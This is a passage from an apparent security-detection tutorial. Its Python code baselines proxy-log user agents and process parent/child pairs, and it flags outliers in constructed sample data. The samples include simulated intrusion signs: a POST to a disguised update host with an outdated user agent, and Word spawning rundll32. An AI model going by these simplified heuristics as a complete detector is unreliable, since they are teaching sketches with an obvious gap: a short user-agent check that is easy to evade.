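TODAY_LOG = f"""\
2024-01-02T09:00:01Z 10.0.0.11 GET https://www.example.com/ "{FIREFOX_UA}"
2024-01-02T09:07:13Z 10.0.0.15 POST https://update.example-cdn.com/submit.php "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
2024-01-02T09:07:14Z 10.0.0.16 GET https://www.example.com/ "Mozilla/5.0"
"""

_LINE_RE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>\S+) (?P<url>\S+) "(?P<ua>[^"]*)"$')


def parse_proxy_log(text):
    """Parse the constructed proxy format into dicts; lines that do not match are skipped."""
    return [m.groupdict() for m in map(_LINE_RE.match, text.splitlines()) if m]


def ua_family(ua):
    """Collapse a user agent string into a coarse browser family for baselining.
    Order matters: Edge also carries 'Chrome/', and Chrome also carries 'Safari/'."""
    if "Edg/" in ua:
        return "edge"
    if "Chrome/" in ua:
        return "chrome"
    if "Firefox/" in ua:
        return "firefox"
    if "MSIE" in ua or "Trident/" in ua:
        return "ie"
    return "other"


def ua_is_malformed(ua):
    """Heuristic: a real browser sends a platform token in parentheses and a fairly long string."""
    return len(ua) < 30 or "(" not in ua


def learn_baseline(events, key, min_count=1):
    """Set of keys seen at least min_count times in a known-good window."""
    counts = Counter(key(e) for e in events)
    return {k for k, n in counts.items() if n >= min_count}


def find_outliers(events, baseline, key):
    """Events whose key never appeared in the baseline."""
    return [e for e in events if key(e) not in baseline]


def _family_of(event):
    return ua_family(event["ua"])


def ua_findings(baseline_text, review_text):
    """Return (rule, src_ip, user_agent) tuples for the review window."""
    baseline = learn_baseline(parse_proxy_log(baseline_text), _family_of)
    review = parse_proxy_log(review_text)
    findings = [("unexpected-ua-family", e["src"], e["ua"])
                for e in find_outliers(review, baseline, _family_of)]
    findings += [("malformed-ua", e["src"], e["ua"]) for e in review if ua_is_malformed(e["ua"])]
    return findings


# Constructed process-creation events as (parent_image, image): the shape you get from
# a Sysmon event 1 or EDR process telemetry after normalization.
BASELINE_PROCS = [
    ("services.exe", "svchost.exe"), ("services.exe", "svchost.exe"),
    ("explorer.exe", "outlook.exe"), ("explorer.exe", "winword.exe"),
    ("explorer.exe", "firefox.exe"), ("winword.exe", "splwow64.exe"),
]
TODAY_PROCS = [
    ("explorer.exe", "winword.exe"),
    ("winword.exe", "rundll32.exe"),   # a document viewer spawning a host process: not in the map
    ("services.exe", "svchost.exe"),
]


def _pair_of(event):
    return event  # events are already (parent, child) tuples


def process_findings(baseline_pairs, review_pairs):
    """Flag parent/child pairs that are absent from the learned process map."""
    baseline = learn_baseline(baseline_pairs, _pair_of)
    return [("unexpected-parent-child", parent, child)
            for parent, child in find_outliers(review_pairs, baseline, _pair_of)]


if __name__ == "__main__":
    for finding in ua_findings(BASELINE_LOG, TODAY_LOG) + process_findings(BASELINE_PROCS, TODAY_PROCS):
        print(*finding)
```

Both checks share the same shape: learn a set of "normal" keys from a window you trust, then report anything in the review window whose key is not in that set. Raising `min_count` turns rare-but-seen values into findings as well, which is how you would catch a single odd user agent in a large fleet; in practice the process map should be learned per host role, since a build server and a laptop have different legitimate parents.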